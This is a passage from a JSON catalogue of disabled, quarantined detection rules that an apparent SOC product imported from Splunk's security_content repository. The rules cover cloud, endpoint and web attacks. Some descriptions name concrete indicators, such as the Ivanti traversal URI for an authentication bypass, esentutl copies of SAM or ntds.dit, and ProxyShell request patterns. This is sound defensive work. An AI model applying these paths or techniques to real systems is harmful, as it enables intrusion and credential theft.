"medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-falco-shell-spawned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d2feef92-d54a-4a19-8306-b47c6ceba5b2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_falco_shell_spawned.yml" } }, { "id": "splunk-security-content-d308b0f1-edb7-4a62-a614-af321160710f", "type": "detection", "name": "AWS Defense Evasion Delete CloudWatch Log Group", "description": "The following analytic detects the deletion of CloudWatch log groups in AWS, identified through `DeleteLogGroup` events in CloudTrail logs. This detection leverages CloudTrail data to monitor for successful log group deletions, excluding console-based actions. This activity is significant as it indicates potential attempts to evade logging and monitoring, which is crucial for maintaining visibility into AWS activities. If confirmed malicious, this could allow attackers to hide their tracks, making it difficult to detect further malicious actions or investigate incidents within the compromised AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-delete-cloudwatch-log-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d308b0f1-edb7-4a62-a614-af321160710f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_delete_cloudwatch_log_group.yml" } }, { "id": "splunk-security-content-d31de944-4e61-468f-9154-e50690f0e99e", "type": "detection", "name": "Windows Chromium Process Launched with Logging Disabled", "description": "The following analytic detects instances of Chromium-based browser processes on Windows launched with logging disabled via command-line arguments such as --disable-logging and --disable-logging-redirect.\nThe --disable-logging flag forces browser logging to be disabled, while --disable-logging-redirect disables log redirection and is commonly used for testing or debugging scenarios.\nLogging is enabled by default in Chromium debug builds, making these flags more likely to appear in debug or development environments.\nWhile these options may be legitimately used by automation frameworks, debugging workflows, or isolated testing environments, they are also leveraged by malware and malicious scripts to evade security monitoring.\nAnalysts should review the parent process, full command-line parameters, and execution context to determine whether the behavior is expected or potentially suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-launched-with-logging-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d31de944-4e61-468f-9154-e50690f0e99e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_launched_with_logging_disabled.yml" } }, { "id": "splunk-security-content-d33aac9f-030c-4830-8701-0c2dd75bb6cb", "type": "detection", "name": "Windows Sqlservr Spawning Shell", "description": "This analytic detects instances where the sqlservr.exe process spawns a command shell (cmd.exe) or PowerShell process. This behavior is often indicative of command execution initiated from within the SQL Server process, potentially due to exploitation of SQL injection vulnerabilities or the use of extended stored procedures like xp_cmdshell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sqlservr-spawning-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d33aac9f-030c-4830-8701-0c2dd75bb6cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sqlservr_spawning_shell.yml" } }, { "id": "splunk-security-content-d36459b1-7901-401a-a67e-44426c15b168", "type": "detection", "name": "Cisco Secure Firewall - React Server Components RCE Attempt", "description": "This analytic detects exploitation activity of CVE-2025-55182 using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signature 65554 (React Server Components remote code execution attempt) is triggered\nIf confirmed malicious, this behavior could be indicative of a potential exploitation of CVE-2025-55182.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-react-server-components-rce-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d36459b1-7901-401a-a67e-44426c15b168", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___react_server_components_rce_attempt.yml" } }, { "id": "splunk-security-content-d372f928-ce4f-11eb-a762-acde48001122", "type": "detection", "name": "Esentutl SAM Copy", "description": "The following analytic detects the use of `esentutl.exe` to access credentials stored in the ntds.dit or SAM file. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it may indicate an attempt to extract sensitive credential information, which is a common tactic in lateral movement and privilege escalation. If confirmed malicious, this could allow an attacker to gain unauthorized access to user credentials, potentially compromising the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esentutl-sam-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d372f928-ce4f-11eb-a762-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/esentutl_sam_copy.yml" } }, { "id": "splunk-security-content-d3f7a803-e802-448b-8eb2-e796b223bfff", "type": "detection", "name": "ConnectWise ScreenConnect Authentication Bypass", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1709 vulnerability, which allows attackers to bypass authentication via an alternate path or channel. It leverages web request logs to identify access to the SetupWizard.aspx page, indicating potential exploitation. This activity is significant as it can lead to unauthorized administrative access and remote code execution. If confirmed malicious, attackers could create administrative users and gain full control over the affected system, posing severe security risks. Immediate remediation by updating to version 23.9.8 or above is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/connectwise-screenconnect-authentication-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d3f7a803-e802-448b-8eb2-e796b223bfff", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/connectwise_screenconnect_authentication_bypass.yml" } }, { "id": "splunk-security-content-d3fffa37-492f-487b-a35d-c60fcb2acf01", "type": "detection", "name": "Detect Spike in blocked Outbound Traffic from your AWS", "description": "The following analytic identifies spikes in blocked outbound network connections originating from within your AWS environment. It leverages VPC Flow Logs data from CloudWatch, focusing on blocked actions from internal IP ranges to external destinations. This detection is significant as it can indicate potential exfiltration attempts or misconfigurations leading to data leakage. If confirmed malicious, such activity could allow attackers to bypass network defenses, leading to unauthorized data transfer or communication with malicious external entities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-blocked-outbound-traffic-from-your-aws.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d3fffa37-492f-487b-a35d-c60fcb2acf01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_blocked_outbound_traffic_from_your_aws.yml" } }, { "id": "splunk-security-content-d436f9e7-0ee7-4a47-864b-6dea2c4e2752", "type": "detection", "name": "Windows Exchange Autodiscover SSRF Abuse", "description": "This analytic identifies potential exploitation attempts of ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyNotShell (CVE-2022-41040, CVE-2022-41082) vulnerabilities in Microsoft Exchange Server. The detection focuses on identifying the SSRF attack patterns used in these exploit chains. The analytic monitors for suspicious POST requests to /autodiscover/autodiscover.json endpoints that may indicate attempts to enumerate LegacyDN attributes as part of initial reconnaissance. It also detects requests containing X-Rps-CAT parameters that could indicate attempts to impersonate Exchange users and access the PowerShell backend. Additionally, it looks for MAPI requests that may be used to obtain user SIDs, along with suspicious user agents (particularly Python-based) commonly used in automated exploit attempts. If successful, these attacks can lead to remote code execution as SYSTEM, allowing attackers to deploy webshells, access mailboxes, or gain persistent access to the Exchange server and potentially the broader network environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-exchange-autodiscover-ssrf-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d436f9e7-0ee7-4a47-864b-6dea2c4e2752", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/windows_exchange_autodiscover_ssrf_abuse.yml" } }, { "id": "splunk-security-content-d441364c-349c-453b-b55f-12eccab67cf9", "type": "detection", "name": "O365 Excessive Authentication Failures Alert", "description": "The following analytic identifies an excessive number of authentication failures, including failed attempts against MFA prompt codes. It uses data from the `o365_management_activity` dataset, focusing on events where the authentication status is marked as failure. This behavior is significant as it may indicate a brute force attack or an attempt to compromise user accounts. If confirmed malicious, this activity could lead to unauthorized access, data breaches, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-excessive-authentication-failures-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d441364c-349c-453b-b55f-12eccab67cf9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_excessive_authentication_failures_alert.yml" } }, { "id": "splunk-security-content-d4a3eb62-0f1e-11ec-a971-acde48001122", "type": "detection", "name": "Add DefaultUser And Password In Registry", "description": "The following analytic detects suspicious registry modifications that implement auto admin logon by adding DefaultUserName and DefaultPassword values. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" registry path. This activity is significant because it is associated with BlackMatter ransomware, which uses this technique to automatically log on to compromised hosts and continue encryption after a safe mode boot. If confirmed malicious, this could allow attackers to maintain persistence and further encrypt the network, leading to significant data loss and operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/add-defaultuser-and-password-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4a3eb62-0f1e-11ec-a971-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/add_defaultuser_and_password_in_registry.yml" } }, { "id": "splunk-security-content-d4c4d4eb-3994-41ca-a25e-a82d64e125bb", "type": "detection", "name": "AWS ECR Container Upload Outside Business Hours", "description": "The following analytic detects the upload of a new container image to AWS Elastic Container Registry (ECR) outside of standard business hours. It leverages AWS CloudTrail logs to identify `PutImage` events occurring between 8 PM and 8 AM or on weekends. This activity is significant because container uploads outside business hours can indicate unauthorized or suspicious activity, potentially pointing to a compromised account or insider threat. If confirmed malicious, this could allow an attacker to deploy unauthorized or malicious containers, leading to potential data breaches or service disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-upload-outside-business-hours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4c4d4eb-3994-41ca-a25e-a82d64e125bb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_upload_outside_business_hours.yml" } }, { "id": "splunk-security-content-d4e40b7e-aad3-4a7d-aac8-550ea5222be5", "type": "detection", "name": "Linux Cpulimit Privilege Escalation", "description": "The following analytic detects the use of the 'cpulimit' command with specific flags ('-l', '-f') executed with 'sudo' privileges. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and execution details. This activity is significant because if 'cpulimit' is granted sudo rights, a user can potentially execute system commands as root, leading to privilege escalation. If confirmed malicious, this could allow an attacker to gain root access, execute arbitrary commands, and fully compromise the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-cpulimit-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4e40b7e-aad3-4a7d-aac8-550ea5222be5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_cpulimit_privilege_escalation.yml" } }, { "id": "splunk-security-content-d4f42098-4680-11ec-ad07-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via DCOM and PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with arguments used to start a process on a remote endpoint by abusing the DCOM protocol, specifically targeting ShellExecute and ExecuteShellCommand. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant as it indicates potential lateral movement and remote code execution attempts by adversaries. If confirmed malicious, this could allow attackers to execute arbitrary code remotely, escalate privileges, and move laterally within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-dcom-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4f42098-4680-11ec-ad07-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml" } }, { "id": "splunk-security-content-d5039508-998d-4cfc-8b5e-9dcd679d9a62", "type": "detection", "name": "Windows ConHost with Headless Argument", "description": "The following analytic detects the unusual invocation of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter. This detection leverages Endpoint Detection and Response (EDR) telemetry, specifically monitoring for command-line executions where conhost.exe is executed with the --headless argument. This activity is significant for a SOC as it is not commonly used in legitimate operations and may indicate an attacker's attempt to execute commands stealthily. If confirmed malicious, this behavior could lead to persistence, lateral movement, or other malicious activities, potentially resulting in data exfiltration or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003", "T1564.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-conhost-with-headless-argument.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5039508-998d-4cfc-8b5e-9dcd679d9a62", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_conhost_with_headless_argument.yml" } }, { "id": "splunk-security-content-d51c13dd-a232-4c83-a2bb-72ab36233c5d", "type": "detection", "name": "Ivanti Connect Secure System Information Access via Auth Bypass", "description": "The following analytic identifies attempts to exploit the CVE-2023-46805 and CVE-2024-21887 vulnerabilities in Ivanti Connect Secure. It detects GET requests to the /api/v1/totp/user-backup-code/../../system/system-information URI, which leverage an authentication bypass to access system information. The detection uses the Web datamodel to identify requests with a 200 OK response, indicating a successful exploit attempt. This activity is significant as it reveals potential unauthorized access to sensitive system information. If confirmed malicious, attackers could gain critical insights into the system, facilitating further exploitation and compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-connect-secure-system-information-access-via-auth-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d51c13dd-a232-4c83-a2bb-72ab36233c5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_connect_secure_system_information_access_via_auth_bypass.yml" } }, { "id": "splunk-security-content-d56fe0c8-4650-11ec-a8fa-acde48001122", "type": "detection", "name": "Windows DiskCryptor Usage", "description": "The following analytic detects the execution of DiskCryptor, identified by the process names \"dcrypt.exe\" or \"dcinst.exe\". This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. DiskCryptor is significant because adversaries use it to manually encrypt disks during an operation, potentially leading to data inaccessibility. If confirmed malicious, this activity could result in complete disk encryption, causing data loss and operational disruption. Immediate investigation is required to mitigate potential ransomware attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-diskcryptor-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d56fe0c8-4650-11ec-a8fa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_diskcryptor_usage.yml" } }, { "id": "splunk-security-content-d57ce957-151a-4aec-ada5-5fb1eb555b6b", "type": "detection", "name": "Windows AppLocker Execution from Uncommon Locations", "description": "The following analytic identifies the execution of applications or scripts from uncommon or suspicious file paths, potentially indicating malware or unauthorized activity. It leverages Windows AppLocker event logs and uses statistical analysis to detect anomalies. By calculating the average and standard deviation of execution counts per file path, it flags paths with execution counts significantly higher than expected. This behavior is significant as it can uncover malicious activities or policy violations. If confirmed malicious, this activity could allow attackers to execute unauthorized code, leading to potential system compromise or data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-execution-from-uncommon-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d57ce957-151a-4aec-ada5-5fb1eb555b6b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_execution_from_uncommon_locations.yml" } }, { "id": "splunk-security-content-d585e253-1859-4170-977d-09376c731f74", "type": "detection", "name": "Windows Short Lived DNS Record", "description": "The following analytic identifies the creation and quick deletion of a DNS object within 300 seconds in an Active Directory environment, indicative of a potential attack abusing DNS. This detection leverages Windows Security Event Codes 5136 and 5137, analyzing the duration between these events. This activity is significant as temporary DNS entries allows attackers to cause unexpecting network trafficking, leading to potential compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-short-lived-dns-record.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d585e253-1859-4170-977d-09376c731f74", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_short_lived_dns_record.yml" } }, { "id": "splunk-security-content-d5905da5-d050-48db-9259-018d8f034fcf", "type": "detection", "name": "Powershell Load Module in Meterpreter", "description": "The following analytic detects the execution of suspicious PowerShell commands associated with Meterpreter modules, such as \"MSF.Powershell\" and \"MSF.Powershell.Meterpreter\". It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it indicates potential post-exploitation actions, including credential dumping and persistence mechanisms. If confirmed malicious, an attacker could gain extensive control over the compromised system, escalate privileges, and maintain long-term access, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-load-module-in-meterpreter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5905da5-d050-48db-9259-018d8f034fcf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_load_module_in_meterpreter.yml" } }, { "id": "splunk-security-content-d5a62490-6e09-11ec-884e-acde48001122", "type": "detection", "name": "Linux Doas Tool Execution", "description": "The following analytic detects the execution of the 'doas' tool on a Linux host. This tool allows standard users to perform tasks with root privileges, similar to 'sudo'. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as 'doas' can be exploited by adversaries to gain elevated privileges on a compromised host. If confirmed malicious, this could lead to unauthorized administrative access, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-doas-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5a62490-6e09-11ec-884e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_doas_tool_execution.yml" } }, { "id": "splunk-security-content-d5af132c-7c17-439c-9d31-13d55340f36c", "type": "detection", "name": "Scheduled Task Deleted Or Created via CMD", "description": "The following analytic detects the creation or deletion of scheduled tasks via schtasks.exe when invoked with create or delete flags, specifically focusing on those executions where the process includes additional parameters such as /tr, /sc, or /ru. The detection uses Endpoint Detection and Response (EDR) telemetry mapped to the Endpoint data model, and filters out events originating from trusted system paths like C:\\Windows\\System32 or C:\\Program Files. It further narrows results to cases where schtasks.exe is launched by potentially suspicious parent processes such as cmd.exe, wscript.exe, or cscript.exe, and excludes service accounts. This behavior may indicate adversary efforts to gain persistence or evade detection by manipulating scheduled tasks using scripts or command shells. If confirmed malicious, such activity could lead to unauthorized code execution or the removal of monitoring mechanisms on endpoints.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/scheduled-task-deleted-or-created-via-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5af132c-7c17-439c-9d31-13d55340f36c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml" } }, { "id": "splunk-security-content-d5bf5cf2-da71-11eb-92c2-acde48001122", "type": "detection", "name": "Spoolsv Writing a DLL", "description": "The following analytic detects `spoolsv.exe` writing a `.dll` file, which is unusual behavior and may indicate exploitation of vulnerabilities like CVE-2021-34527 (PrintNightmare). This detection leverages the Endpoint datamodel, specifically monitoring process and filesystem events to identify `.dll` file creation within the `\\spool\\drivers\\x64\\` path. This activity is significant as it may signify an attacker attempting to execute malicious code via the Print Spooler service. If confirmed malicious, this could lead to unauthorized code execution and potential system compromise. Immediate endpoint isolation and further investigation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-writing-a-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5bf5cf2-da71-11eb-92c2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_writing_a_dll.yml" } }, { "id": "splunk-security-content-d5d865e4-03e6-43da-98f4-28a4f42d4df7", "type": "detection", "name": "VMWare Aria Operations Exploit Attempt", "description": "The following analytic detects potential exploitation attempts against VMWare vRealize Network Insight, specifically targeting the CVE-2023-20887 vulnerability.\nIt monitors web traffic for HTTP POST requests directed at the vulnerable endpoint \"/saas./resttosaasservlet.\" This detection leverages web traffic data, focusing on specific URL patterns and HTTP methods.\nIdentifying this behavior is crucial for a SOC as it indicates an active exploit attempt.\nIf confirmed malicious, the attacker could execute arbitrary code, leading to unauthorized access, data theft, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1210", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/vmware-aria-operations-exploit-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5d865e4-03e6-43da-98f4-28a4f42d4df7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/vmware_aria_operations_exploit_attempt.yml" 